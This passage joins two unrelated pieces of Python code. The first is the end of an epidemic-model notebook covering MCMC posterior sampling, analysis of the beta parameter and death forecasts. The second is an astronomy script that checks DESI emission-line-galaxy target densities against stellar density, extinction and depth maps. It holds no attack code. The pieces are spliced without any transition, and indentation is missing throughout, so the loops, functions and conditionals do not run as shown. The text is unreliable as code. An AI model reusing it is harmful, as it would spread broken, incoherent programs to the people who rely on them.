(note that this is a slice of the likelihood, not the posterior, hence the MAP is not exactly at its peak)
```
## range for beta (relative to MAP)
rangeParam = 0.1
[bVals,likVals] = synth_fns.sliceLikelihood(rangeParam,infResult,
estimator,obsData,fltrDeath,contactMatrix,Tf_inference)
#print('logLiks',likVals,logp)
plt.plot(bVals , likVals, 'o-')
plt.plot(infResult['params_dict']['beta'],infResult['log_likelihood'],'s',ms=6)
plt.show()
```
### MCMC
```
sampler = synth_fns.do_mcmc(mcSamples, nProcMCMC, estimator, Tf_inference, infResult,
obsData, fltrDeath, param_priors, init_priors,
model_dict,infSeed)
plotMCtrace([0,2,3], sampler)
result_mcmc = synth_fns.load_mcmc_result(estimator, obsData, fltrDeath, sampler, param_priors, init_priors, model_dict)
print('result shape',np.shape(result_mcmc))
print('last sample\n',result_mcmc[-1])
```
#### save the result
```
if saveMC :
opFile = fileRoot + "-mcmc.pik"
print('opf',opFile)
with open(opFile, 'wb') as f:
pickle.dump([infResult,result_mcmc],f)
```
#### estimate MCMC autocorrelation
```
# these are the estimated autocorrelation times for the sampler
# (it would like runs ~50 times longer than this...)
pp = sampler.get_log_prob()
nSampleTot = np.shape(pp)[0]
#print('correl',sampler.get_autocorr_time(discard=int(nSampleTot/3)))
print('nSampleTot',nSampleTot)
```
#### plot posterior distributions
```
plotPosteriors(estimator,obsData, fltrDeath, Tf_inference,param_priors, init_priors,contactMatrix,
infResult,parameters_true,trueInit)
```
### analyse posterior for beta
```
betas = [ rr['params_dict']['beta'] for rr in result_mcmc ]
postMeanBeta = np.mean(betas)
postStdBeta = np.std(betas)
postCIBeta = [ np.percentile(betas,2.5) , np.percentile(betas,97.5)]
print("beta: true {b:.5f} MAP {m:.5f}".format(b=parameters_true['beta'],m=infResult['params_dict']['beta']))
print("post: mean {m:.5f} std {s:.5f} CI95: {l:.5f} {u:.5f}".format(m=postMeanBeta,
s=postStdBeta,
l=postCIBeta[0],u=postCIBeta[1]))
```
### posterior correlations for initial conditions
```
sis = np.array( [ rr['x0'][0] for rr in result_mcmc ] )/popN
eis = np.array( [ rr['x0'][1] for rr in result_mcmc ] )/popN
iis = np.array( [ rr['x0'][2] for rr in result_mcmc ] )/popN
betas = [ rr['params_dict']['beta'] for rr in result_mcmc ]
fig,axs = plt.subplots(1,3,figsize=(15,4))
plt.subplots_adjust(wspace=0.35)
ax = axs[0]
ax.plot(eis,iis,'o',ms=2)
ax.set_xlabel('E0')
ax.set_ylabel('I0')
ax = axs[1]
ax.plot(1-eis-iis-sis,sis,'o',ms=2)
ax.set_ylabel('S0')
ax.set_xlabel('R0')
ax = axs[2]
ax.plot(1-eis-iis-sis,betas,'o',ms=2)
ax.set_ylabel('beta')
ax.set_xlabel('R0')
plt.show()
def forecast(result_mcmc, nsamples, Nf_start, Tf_inference, Nf_inference, estimator, obs, fltr, contactMatrix):
trajs = []
#x = (data_array[Nf_start:Nf_start+Nf_inference])
#obs=np.einsum('ij,kj->ki', fltr, x)
# this should pick up the right number of traj, equally spaced
totSamples = len(result_mcmc)
skip = int(totSamples/nsamples)
modulo = totSamples % skip
#print(modulo,skip)
for sample_res in result_mcmc[modulo::skip]:
endpoints = estimator.sample_endpoints(obs, fltr, Tf_inference, sample_res, 1, contactMatrix=contactMatrix)
xm = estimator.integrate(endpoints[0], Nf_start+Tf_inference, Tf, Nf-Tf_inference-Nf_start, dense_output=False)
trajs.append(xm)
return trajs
def plot_forecast(allTraj, data_array, nsamples, Tf,Nf, Nf_start, Tf_inference, Nf_inference, M,
estimator, obs, contactMatrix):
#x = (data_array[Tf_start:Tf_start+Nf_inference]).astype('float')
#obs=np.einsum('ij,kj->ki', fltr, x)
#samples = estimator.sample_endpoints(obs, fltr, Tf_inference, res, nsamples, contactMatrix=contactMatrix)
time_points = np.linspace(0, Tf, Nf)
fig = plt.figure(num=None, figsize=(10, 8), dpi=80, facecolor='w', edgecolor='k')
plt.rcParams.update({'font.size': 22})
#for x_start in samples:
for traj in allTraj:
#xm = estimator.integrate(x_start, Tf_start+Tf_inference, Tf, Nf-Tf_inference-Tf_start, dense_output=False)
# plt.plot(time_points[Tf_inference+Tf_start:], np.sum(xm[:, M:2*M], axis=1), color='grey', alpha=0.1)
# plt.plot(time_points[Tf_inference+Tf_start:], np.sum(xm[:, 2*M:3*M], axis=1), color='grey', alpha=0.1)
incDeaths = np.diff( np.sum(traj[:, 3*M:4*M], axis=1) )
plt.plot(time_points[1+Tf_inference+Nf_start:], incDeaths, color='grey', alpha=0.2)
# plt.plot(time_points, np.sum(data_array[:, M:2*M], axis=1), label='True E')
# plt.plot(time_points, np.sum(data_array[:, 2*M:3*M], axis=1), label='True I')
incDeathsObs = np.diff( np.sum(data_array[:, 3*M:4*M], axis=1) )
plt.plot(time_points[1:],incDeathsObs, 'ko', label='True D')
plt.axvspan(Nf_start, Tf_inference+Nf_start,
label='Used for inference',
alpha=0.3, color='dodgerblue')
plt.xlim([0, Tf])
plt.legend()
plt.show()
nsamples = 40
foreTraj = forecast(result_mcmc, nsamples, Nf_start, Tf_inference, Nf_inference,
estimator, obsData, fltrDeath, contactMatrix)
print(len(foreTraj))
foreTraj = np.array( foreTraj )
np.save(fileRoot+'-foreTraj.npy',foreTraj)
plot_forecast(foreTraj, syntheticData, nsamples, Tf,Nf, Nf_start, Tf_inference, Nf_inference, cohortsM,
estimator, obsData, contactMatrix)
print(Nf_inference)
print(len(result_mcmc))
```
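The `result_mcmc[modulo::skip]` slicing inside `forecast` is just a way to take (roughly) `nsamples` equally spaced samples from the chain; a minimal stand-alone sketch of that selection (`equally_spaced` is an illustrative helper, not part of the notebook):

```python
def equally_spaced(samples, nsamples):
    # pick ~nsamples equally spaced elements, mirroring the
    # modulo/skip slicing used in forecast() above
    skip = len(samples) // nsamples
    modulo = len(samples) % skip
    return samples[modulo::skip]

picked = equally_spaced(list(range(1000)), 40)
```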
```
'''
Notebook to specifically study correlations between ELG targets and Galactic foregrounds
Much of this made possible and copied from script shared by Anand Raichoor
Run in Python 3; install pymangle, fitsio, healpy locally: pip install --user fitsio; pip install --user healpy; git clone https://github.com/esheldon/pymangle...
'''
import fitsio
import numpy as np
#from desitarget.io import read_targets_in_hp, read_targets_in_box, read_targets_in_cap
import astropy.io.fits as fits
import glob
import os
import healpy as hp
from matplotlib import pyplot as plt
#Some information is in a pixelized map
#get nside and nest from the header
pixfn = '/project/projectdirs/desi/target/catalogs/dr8/0.31.1/pixweight/pixweight-dr8-0.31.1.fits'
hdr = fits.getheader(pixfn,1)
nside,nest = hdr['HPXNSIDE'],hdr['HPXNEST']
print(nside,nest)
print(fits.open(pixfn)[1].columns.names)
hpq = fitsio.read(pixfn)
#get MC efficiency
mcf = fitsio.read(os.getenv('SCRATCH')+'/ELGMCeffHSCHP.fits')
mmc = np.mean(mcf['EFF'])
mcl = np.zeros(12*nside*nside)
for i in range(0,len(mcf)):
pix = mcf['HPXPIXEL'][i]
mcl[pix] = mcf['EFF'][i]/mmc
#ELGs were saved here
elgf = os.getenv('SCRATCH')+'/ELGtargetinfo.fits'
#for healpix
def radec2thphi(ra,dec):
return (-dec+90.)*np.pi/180.,ra*np.pi/180.
#read in ELGs, put them into healpix
felg = fitsio.read(elgf)
dth,dphi = radec2thphi(felg['RA'],felg['DEC'])
dpix = hp.ang2pix(nside,dth,dphi,nest)
lelg = len(felg)
print(lelg)
#full random file is available, easy to read some limited number; take 1.5x ELG to start with
rall = fitsio.read('/project/projectdirs/desi/target/catalogs/dr8/0.31.0/randomsall/randoms-inside-dr8-0.31.0-all.fits',rows=np.arange(int(1.5*lelg)))
rall_header = fitsio.read_header('/project/projectdirs/desi/target/catalogs/dr8/0.31.0/randomsall/randoms-inside-dr8-0.31.0-all.fits',ext=1)
#cut randoms to ELG footprint
keep = (rall['NOBS_G']>0) & (rall['NOBS_R']>0) & (rall['NOBS_Z']>0)
print(len(rall[keep]))
elgbits = [1,5,6,7,11,12,13]
keepelg = keep.copy() #copy so the in-place &= below does not also modify keep
for bit in elgbits:
keepelg &= ((rall['MASKBITS'] & 2**bit)==0)
print(len(rall[keepelg]))
relg = rall[keepelg]
print(rall_header)
#write out randoms
#fitsio.write(os.getenv('SCRATCH')+'/ELGrandoms.fits',relg,overwrite=True)
#put randoms into healpix
rth,rphi = radec2thphi(relg['RA'],relg['DEC'])
rpix = hp.ang2pix(nside,rth,rphi,nest=nest)
#let's define split into bmzls, DECaLS North, DECaLS South (Anand has tools to make distinct DES region as well)
#one function to do directly, the other just for the indices
print(np.unique(felg['PHOTSYS']))
#bmzls = b'N' #if in desi environment
bmzls = 'N' #if in Python 3; why the difference? Maybe version of fitsio?
def splitcat(cat):
NN = cat['PHOTSYS'] == bmzls
d1 = (cat['PHOTSYS'] != bmzls) & (cat['RA'] < 300) & (cat['RA'] > 100) & (cat['DEC'] > -20)
d2 = (d1==0) & (NN ==0) & (cat['DEC'] > -30)
return cat[NN],cat[d1],cat[d2]
def splitcat_ind(cat):
NN = cat['PHOTSYS'] == bmzls
d1 = (cat['PHOTSYS'] != bmzls) & (cat['RA'] < 300) & (cat['RA'] > 100) & (cat['DEC'] > -20)
d2 = (d1==0) & (NN ==0) & (cat['DEC'] > -30)
return NN,d1,d2
#indices for split
dbml,ddnl,ddsl = splitcat_ind(felg)
rbml,rdnl,rdsl = splitcat_ind(relg)
print(len(felg[dbml]),len(felg[ddnl]),len(felg[ddsl]))
#put into full sky maps (probably not necessary but easier to keep straight down the line)
pixlrbm = np.zeros(12*nside*nside)
pixlgbm = np.zeros(12*nside*nside)
pixlrdn = np.zeros(12*nside*nside)
pixlgdn = np.zeros(12*nside*nside)
pixlrds = np.zeros(12*nside*nside)
pixlgds = np.zeros(12*nside*nside)
for pix in rpix[rbml]:
pixlrbm[pix] += 1.
print('randoms done')
for pix in dpix[dbml]:
pixlgbm[pix] += 1.
for pix in rpix[rdnl]:
pixlrdn[pix] += 1.
print('randoms done')
for pix in dpix[ddnl]:
pixlgdn[pix] += 1.
for pix in rpix[rdsl]:
pixlrds[pix] += 1.
print('randoms done')
for pix in dpix[ddsl]:
pixlgds[pix] += 1.
slp = -0.35/4000.
b = 1.1
ws = 1./(slp*hpq['STARDENS']+b)
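#the stellar-density weight above is just the inverse of a linear density model,
#n/nbar ~ slp*stardens + b; quick check with toy values (hypothetical, for illustration):
import numpy as np
_sd = np.array([0.,2000.,4000.])
_ws = 1./((-0.35/4000.)*_sd+1.1)
#_ws rises from ~0.91 at zero stellar density to ~1.33 at 4000 stars/deg^2,
#upweighting galaxies in star-dense regions to flatten the trend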
print(len(pixlgds))
def plotvshp(r1,d1,sys,rng,gdzm=20,ebvm=0.15,useMCeff=True,correctstar=False,title='',effac=1.,south=True):
w = hpq['GALDEPTH_Z'] > gdzm
w &= hpq['EBV'] < ebvm
if useMCeff:
w &= mcl > 0
if sys != 'gdc' and sys != 'rdc' and sys != 'zdc':
sm = hpq[w][sys]
else:
if sys == 'gdc':
print('g depth, extinction corrected')
sm = hpq[w]['GALDEPTH_G']*np.exp(-3.214*hpq[w]['EBV'])
if sys == 'rdc':
sm = hpq[w]['GALDEPTH_R']*np.exp(-2.165*hpq[w]['EBV'])
if sys == 'zdc':
sm = hpq[w]['GALDEPTH_Z']*np.exp(-1.211*hpq[w]['EBV'])
ds = np.ones(len(d1))
if correctstar:
ds = ws
dmc = np.ones(len(d1))
if useMCeff:
dmc = mcl**effac
hd1 = np.histogram(sm,weights=d1[w]*ds[w]/dmc[w],range=rng)
hdnoc = np.histogram(sm,weights=d1[w],bins=hd1[1],range=rng)
#print(hd1)
hr1 = np.histogram(sm,weights=r1[w],bins=hd1[1],range=rng)
#print(hr1)
xl = []
for i in range(0,len(hd1[0])):
xl.append((hd1[1][i]+hd1[1][i+1])/2.)
plt.errorbar(xl,hd1[0]/hr1[0]/(sum(d1[w]*ds[w]/dmc[w])/sum(r1[w])),np.sqrt(hd1[0])/hr1[0]/(lelg/len(relg)),fmt='ko')
if useMCeff:
plt.plot(xl,hdnoc[0]/hr1[0]/(sum(d1[w])/sum(r1[w])),'k--')
print(hd1[0]/hr1[0]/(sum(d1[w]*ds[w]/dmc[w])/sum(r1[w])))
#plt.title(str(mp)+reg)
plt.plot(xl,np.ones(len(xl)),'k:')
plt.ylabel('relative density')
plt.xlabel(sys)
plt.ylim(0.7,1.3)
plt.title(title)
plt.show()
title = 'DECaLS South'
effac=2.
plotvshp(pixlrds,pixlgds,'STARDENS',(0,0.5e4),title=title,effac=effac)
plotvshp(pixlrds,pixlgds,'PSFSIZE_G',(.9,2.5),title=title,effac=effac)
plotvshp(pixlrds,pixlgds,'PSFSIZE_R',(.8,2.5),title=title,effac=effac)
plotvshp(pixlrds,pixlgds,'PSFSIZE_Z',(.8,2.5),title=title,effac=effac)
plotvshp(pixlrds,pixlgds,'EBV',(0,0.15),title=title,effac=effac)
plotvshp(pixlrds,pixlgds,'gdc',(0,3000),title=title,effac=effac)
plotvshp(pixlrds,pixlgds,'rdc',(0,1000),title=title,effac=effac)
plotvshp(pixlrds,pixlgds,'zdc',(20,200),title=title,effac=effac)
title = 'DECaLS North'
effac=2.
slp = -0.35/4000.
b = 1.1
ws = 1./(slp*hpq['STARDENS']+b)
cs = True
plotvshp(pixlrdn,pixlgdn,'STARDENS',(0,0.5e4),title=title,effac=effac,correctstar=False)
plotvshp(pixlrdn,pixlgdn,'PSFSIZE_G',(.8,2.5),title=title,effac=effac,correctstar=False)
plotvshp(pixlrdn,pixlgdn,'PSFSIZE_R',(.8,2.5),title=title,effac=effac)
plotvshp(pixlrdn,pixlgdn,'PSFSIZE_Z',(.8,2.),title=title,effac=effac)
plotvshp(pixlrdn,pixlgdn,'EBV',(0,0.15),title=title,effac=effac,correctstar=cs)
plotvshp(pixlrdn,pixlgdn,'gdc',(0,3000),title=title,effac=effac,correctstar=cs)
plotvshp(pixlrdn,pixlgdn,'rdc',(0,1000),title=title,effac=effac,correctstar=cs)
plotvshp(pixlrdn,pixlgdn,'zdc',(20,200),title=title,effac=effac,correctstar=cs)
title = 'BASS/MZLS'
effac=1.
slp = -0.2/4000.
b = 1.1
ws = 1./(slp*hpq['STARDENS']+b)
cs = True
plotvshp(pixlrbm,pixlgbm,'STARDENS',(0,0.5e4),title=title,effac=effac,correctstar=cs)
plotvshp(pixlrbm,pixlgbm,'PSFSIZE_G',(.8,2.5),title=title,effac=effac,correctstar=False)
plotvshp(pixlrbm,pixlgbm,'PSFSIZE_R',(.8,2.5),title=title,effac=effac)
plotvshp(pixlrbm,pixlgbm,'PSFSIZE_Z',(.8,2.),title=title,effac=effac)
plotvshp(pixlrbm,pixlgbm,'EBV',(0,0.15),title=title,effac=effac,correctstar=cs)
plotvshp(pixlrbm,pixlgbm,'gdc',(0,2000),title=title,effac=effac,correctstar=cs)
plotvshp(pixlrbm,pixlgbm,'rdc',(0,1000),title=title,effac=effac,correctstar=cs)
plotvshp(pixlrbm,pixlgbm,'zdc',(20,200),title=title,effac=effac,correctstar=cs)
'''
Below here, directly use data/randoms
'''
#Open files with grids for efficiency and define function to interpolate them (to be improved)
grids = np.loadtxt(os.getenv('SCRATCH')+'/ELGeffgridsouth.dat').transpose()
#grids[3] = grids[3]
gridn = np.loadtxt(os.getenv('SCRATCH')+'/ELGeffgridnorth.dat').transpose()
#print(np.mean(gridn[3]))
#gridn[3] = gridn[3]/np.mean(gridn[3])
def interpeff(gsig,rsig,zsig,south=True):
md = 0
xg = 0.15
#if gsig > xg:
# gsig = .99*xg
xr = 0.15
#if rsig > xr:
# rsig = 0.99*xr
xz = 0.4
#if zsig > xz:
# zsig = 0.99*xz
ngp = 30
if south:
grid = grids
else:
grid = gridn
i = (ngp*gsig/(xg-md)).astype(int)
j = (ngp*rsig/(xr-md)).astype(int)
k = (ngp*zsig/(xz-md)).astype(int)
ind = (i*ngp**2.+j*ngp+k).astype(int)
#print(i,j,k,ind)
#print(grid[0][ind],grid[1][ind],grid[2][ind])
#print(grid[0][ind-1],grid[1][ind-1],grid[2][ind-1])
#print(grid[0][ind+1],grid[1][ind+1],grid[2][ind+1])
return grid[3][ind]
#print(interpeff([0.0],[0.0],[0.0],south=False))
#print(interpeff(0.0,0.0,0.0,south=True))
#print(0.1/.4)
#print(0.4/30.)
#grid[2][0]
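#the flattened index in interpeff, ind = i*ngp**2 + j*ngp + k, is the C-order
#raveling of a (ngp,ngp,ngp) cube, i.e. the same as np.ravel_multi_index (toy values):
import numpy as np
_ngp = 30
_i,_j,_k = np.array([2]),np.array([7]),np.array([29])
_ind = (_i*_ngp**2+_j*_ngp+_k).astype(int)
_ind2 = np.ravel_multi_index((_i,_j,_k),(_ngp,_ngp,_ngp))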
#Get depth values that match those used for efficiency grids
depth_keyword="PSFDEPTH"
R_G=3.214 # http://legacysurvey.org/dr8/catalogs/#galactic-extinction-coefficients
R_R=2.165
R_Z=1.211
gsigmad=1./np.sqrt(felg[depth_keyword+"_G"])
rsigmad=1./np.sqrt(felg[depth_keyword+"_R"])
zsigmad=1./np.sqrt(felg[depth_keyword+"_Z"])
gsig = gsigmad*10**(0.4*R_G*felg["EBV"])
w = gsig >= 0.15
gsig[w] = 0.99*0.15
rsig = rsigmad*10**(0.4*R_R*felg["EBV"])
w = rsig >= 0.15
rsig[w] = 0.99*0.15
zsig = zsigmad*10**(0.4*R_Z*felg["EBV"])
w = zsig >= 0.4
zsig[w] = 0.99*0.4
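#the three clip-to-grid-edge blocks above can be written more compactly with np.where
#(same 0.99*edge convention as above; toy values for illustration)
import numpy as np
_sig = np.array([0.05,0.15,0.3])
_sig = np.where(_sig>=0.15,0.99*0.15,_sig)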
print(min(gsig),max(gsig))
effsouthl = interpeff(gsig,rsig,zsig,south=True)
effnorthl = interpeff(gsig,rsig,zsig,south=False)
plt.hist(effnorthl,bins=100)
plt.show()
effbm = effnorthl[dbml]
print(np.mean(effbm))
effbm = effbm/np.mean(effbm)
plt.hist(effbm,bins=100)
plt.show()
effdn = effsouthl[ddnl]
print(np.mean(effdn))
effdn = effdn/np.mean(effdn)
plt.hist(effdn,bins=100)
plt.show()
#plt.scatter(felg[dbml]['RA'],felg[dbml]['DEC'],c=effbm)
#plt.colorbar()
#plt.show()
effds = effsouthl[ddsl]
print(np.mean(effds))
effds = effds/np.mean(effds)
plt.hist(effds,bins=100)
plt.show()
stardensg = np.zeros(len(felg))
print(len(felg),len(dpix))
for i in range(0,len(dpix)):
if i%1000000==0 : print(i)
pix = dpix[i]
stardensg[i] = hpq['STARDENS'][pix]
stardensr = np.zeros(len(relg))
print(len(relg),len(rpix))
for i in range(0,len(rpix)):
if i%1000000==0 : print(i)
pix = rpix[i]
stardensr[i] = hpq['STARDENS'][pix]
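#the per-object loops above work, but numpy fancy indexing does the same map->object
#lookup in one call; toy demonstration with a stand-in for hpq['STARDENS']:
import numpy as np
_map = np.arange(10.)          #stand-in full-sky map
_pix = np.array([0,5,5,9])     #stand-in pixel numbers per object
_vals = _map[_pix]             #one map value per object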
#bmzls
slp = -0.2/4000.
b = 1.1
ws = 1./(slp*stardensg[dbml]+b)
hg1 = np.histogram(felg[dbml]['GALDEPTH_G']*np.exp(-3.214*felg[dbml]['EBV']),weights=1./effbm*ws,range=(0,2000))
hr1 = np.histogram(relg[rbml]['GALDEPTH_G']*np.exp(-3.214*relg[rbml]['EBV']),bins=hg1[1])
#no correction
hgn1 = np.histogram(felg[dbml]['GALDEPTH_G']*np.exp(-3.214*felg[dbml]['EBV']),bins=hg1[1])
hrn1 = np.histogram(relg[rbml]['GALDEPTH_G']*np.exp(-3.214*relg[rbml]['EBV']),bins=hg1[1])
#DECaLS N
slp = -0.35/4000.
b = 1.1
ws = 1./(slp*stardensg[ddnl]+b)
hg2 = np.histogram(felg[ddnl]['GALDEPTH_G']*np.exp(-3.214*felg[ddnl]['EBV']),weights=1./effdn**2.*ws,range=(0,3000))
hr2 = np.histogram(relg[rdnl]['GALDEPTH_G']*np.exp(-3.214*relg[rdnl]['EBV']),bins=hg2[1])
hgn2 = np.histogram(felg[ddnl]['GALDEPTH_G']*np.exp(-3.214*felg[ddnl]['EBV']),bins=hg2[1])
hrn2 = np.histogram(relg[rdnl]['GALDEPTH_G']*np.exp(-3.214*relg[rdnl]['EBV']),bins=hg2[1])
#DECaLS S
#no strong relation with stellar density
hg3 = np.histogram(felg[ddsl]['GALDEPTH_G']*np.exp(-3.214*felg[ddsl]['EBV']),weights=1./effds**2.,range=(0,2000))
hr3 = np.histogram(relg[rdsl]['GALDEPTH_G']*np.exp(-3.214*relg[rdsl]['EBV']),bins=hg3[1])
hgn3 = np.histogram(felg[ddsl]['GALDEPTH_G']*np.exp(-3.214*felg[ddsl]['EBV']),bins=hg3[1])
hrn3 = np.histogram(relg[rdsl]['GALDEPTH_G']*np.exp(-3.214*relg[rdsl]['EBV']),bins=hg3[1])
xl1 = []
xl2 = []
xl3 = []
for i in range(0,len(hg1[0])):
xl1.append((hg1[1][i]+hg1[1][i+1])/2.)
xl2.append((hg2[1][i]+hg2[1][i+1])/2.)
xl3.append((hg3[1][i]+hg3[1][i+1])/2.)
norm1 = sum(hg1[0])/sum(hr1[0])
plt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')
plt.plot(xl1,hgn1[0]/hrn1[0]/norm1,'k:')
norm2 = sum(hg2[0])/sum(hr2[0])
plt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')
plt.plot(xl2,hgn2[0]/hrn2[0]/norm2,'r:')
norm3 = sum(hg3[0])/sum(hr3[0])
plt.errorbar(xl3,hg3[0]/hr3[0]/norm3,np.sqrt(hg3[0])/hr3[0],fmt='b^')
plt.plot(xl3,hgn3[0]/hrn3[0]/norm3,'b:')
plt.ylim(.7,1.3)
plt.xlabel('GALDEPTH_G*MWTRANS')
plt.ylabel('relative density')
plt.legend((['bmzls','DECaLS N','DECaLS S']))
plt.plot(xl2,np.ones(len(xl2)),'k--')
plt.title('dashed is before MC+stellar density correction, points are after')
plt.show()
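#the normalized data/random histogram ratio is repeated many times below; a helper
#sketch (hypothetical name, same math as the cells above) would reduce the duplication:
import numpy as np
def histratio(dvals,rvals,dweights=None,rng=None):
    #returns bin centers, normalized density ratio, and Poisson error
    if dweights is None:
        dweights = np.ones(len(dvals))
    hd,edges = np.histogram(dvals,weights=dweights,range=rng)
    hr,_ = np.histogram(rvals,bins=edges)
    norm = sum(hd)/sum(hr)
    xl = 0.5*(edges[:-1]+edges[1:])
    return xl,hd/hr/norm,np.sqrt(hd)/hr
#e.g. xl,ratio,err = histratio(felg[dbml]['EBV'],relg[rbml]['EBV'],rng=(0,0.15))
_x,_r,_e = histratio(np.linspace(0,1,1000),np.linspace(0,1,1000))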
#bmzls
slp = -0.2/4000.
b = 1.1
ws = 1./(slp*stardensg[dbml]+b)
hg1 = np.histogram(felg[dbml]['GALDEPTH_R']*np.exp(-1.*R_R*felg[dbml]['EBV']),weights=1./effbm*ws,range=(0,500))
hr1 = np.histogram(relg[rbml]['GALDEPTH_R']*np.exp(-1.*R_R*relg[rbml]['EBV']),bins=hg1[1])
hgn1 = np.histogram(felg[dbml]['GALDEPTH_R']*np.exp(-1.*R_R*felg[dbml]['EBV']),bins=hg1[1])
#DECaLS N
slp = -0.35/4000.
b = 1.1
ws = 1./(slp*stardensg[ddnl]+b)
hg2 = np.histogram(felg[ddnl]['GALDEPTH_R']*np.exp(-1.*R_R*felg[ddnl]['EBV']),weights=1./effdn**2.*ws,range=(0,1000))
hgn2 = np.histogram(felg[ddnl]['GALDEPTH_R']*np.exp(-1.*R_R*felg[ddnl]['EBV']),bins=hg2[1])
hr2 = np.histogram(relg[rdnl]['GALDEPTH_R']*np.exp(-1.*R_R*relg[rdnl]['EBV']),bins=hg2[1])
#DECaLS S
hg3 = np.histogram(felg[ddsl]['GALDEPTH_R']*np.exp(-1.*R_R*felg[ddsl]['EBV']),weights=1./effds**2.,range=(0,1000))
hgn3 = np.histogram(felg[ddsl]['GALDEPTH_R']*np.exp(-1.*R_R*felg[ddsl]['EBV']),bins=hg3[1])
hr3 = np.histogram(relg[rdsl]['GALDEPTH_R']*np.exp(-1.*R_R*relg[rdsl]['EBV']),bins=hg3[1])
xl1 = []
xl2 = []
xl3 = []
for i in range(0,len(hg1[0])):
xl1.append((hg1[1][i]+hg1[1][i+1])/2.)
xl2.append((hg2[1][i]+hg2[1][i+1])/2.)
xl3.append((hg3[1][i]+hg3[1][i+1])/2.)
norm1 = sum(hg1[0])/sum(hr1[0])
plt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')
plt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')
norm2 = sum(hg2[0])/sum(hr2[0])
plt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')
plt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')
norm3 = sum(hg3[0])/sum(hr3[0])
plt.errorbar(xl3,hg3[0]/hr3[0]/norm3,np.sqrt(hg3[0])/hr3[0],fmt='b^')
plt.plot(xl3,hgn3[0]/hr3[0]/norm3,'b:')
plt.ylim(.7,1.3)
plt.xlabel('GALDEPTH_R*MWTRANS')
plt.ylabel('relative density')
plt.legend((['bmzls','DECaLS N','DECaLS S']))
plt.plot(xl2,np.ones(len(xl2)),'k--')
plt.title('dashed is before MC+stellar density correction, points are after')
plt.show()
#bmzls
slp = -0.2/4000.
b = 1.1
ws = 1./(slp*stardensg[dbml]+b)
hg1 = np.histogram(felg[dbml]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[dbml]['EBV']),weights=1./effbm*ws,range=(0,200))
hgn1 = np.histogram(felg[dbml]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[dbml]['EBV']),bins=hg1[1])
hr1 = np.histogram(relg[rbml]['GALDEPTH_Z']*np.exp(-1.*R_Z*relg[rbml]['EBV']),bins=hg1[1])
#DECaLS N
slp = -0.35/4000.
b = 1.1
ws = 1./(slp*stardensg[ddnl]+b)
hg2 = np.histogram(felg[ddnl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddnl]['EBV']),weights=1./effdn**2.*ws,range=(0,200))
hgn2 = np.histogram(felg[ddnl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddnl]['EBV']),bins=hg2[1])
hr2 = np.histogram(relg[rdnl]['GALDEPTH_Z']*np.exp(-1.*R_Z*relg[rdnl]['EBV']),bins=hg2[1])
#DECaLS S
hg3 = np.histogram(felg[ddsl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddsl]['EBV']),weights=1./effds**2.,range=(0,200))
hgn3 = np.histogram(felg[ddsl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddsl]['EBV']),bins=hg3[1])
hr3 = np.histogram(relg[rdsl]['GALDEPTH_Z']*np.exp(-1.*R_Z*relg[rdsl]['EBV']),bins=hg3[1])
xl1 = []
xl2 = []
xl3 = []
for i in range(0,len(hg1[0])):
xl1.append((hg1[1][i]+hg1[1][i+1])/2.)
xl2.append((hg2[1][i]+hg2[1][i+1])/2.)
xl3.append((hg3[1][i]+hg3[1][i+1])/2.)
norm1 = sum(hg1[0])/sum(hr1[0])
plt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')
plt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')
norm2 = sum(hg2[0])/sum(hr2[0])
plt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')
plt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')
norm3 = sum(hg3[0])/sum(hr3[0])
plt.errorbar(xl3,hg3[0]/hr3[0]/norm3,np.sqrt(hg3[0])/hr3[0],fmt='b^')
plt.plot(xl3,hgn3[0]/hr3[0]/norm3,'b:')
plt.ylim(.7,1.3)
plt.xlabel('GALDEPTH_Z*MWTRANS')
plt.ylabel('relative density')
plt.legend((['bmzls','DECaLS N','DECaLS S']))
plt.plot(xl2,np.ones(len(xl2)),'k--')
plt.title('dashed is before MC+stellar density correction, points are after')
plt.show()
#bmzls
slp = -0.2/4000.
b = 1.1
ws = 1./(slp*stardensg[dbml]+b)
hg1 = np.histogram(stardensg[dbml],weights=1./effbm,range=(0,5000))
hgn1 = np.histogram(stardensg[dbml],bins=hg1[1])
hr1 = np.histogram(stardensr[rbml],bins=hg1[1])
#DECaLS N
slp = -0.35/4000.
b = 1.1
ws = 1./(slp*stardensg[ddnl]+b)
hg2 = np.histogram(stardensg[ddnl],weights=1./effdn**2.,range=(0,5000))
hgn2 = np.histogram(stardensg[ddnl],bins=hg2[1])
hr2 = np.histogram(stardensr[rdnl],bins=hg2[1])
#DECaLS S
hg3 = np.histogram(stardensg[ddsl],weights=1./effds**2.,range=(0,5000))
hgn3 = np.histogram(stardensg[ddsl],bins=hg3[1])
hr3 = np.histogram(stardensr[rdsl],bins=hg3[1])
xl1 = []
xl2 = []
xl3 = []
for i in range(0,len(hg1[0])):
xl1.append((hg1[1][i]+hg1[1][i+1])/2.)
xl2.append((hg2[1][i]+hg2[1][i+1])/2.)
xl3.append((hg3[1][i]+hg3[1][i+1])/2.)
norm1 = sum(hg1[0])/sum(hr1[0])
plt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')
plt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')
norm2 = sum(hg2[0])/sum(hr2[0])
plt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')
plt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')
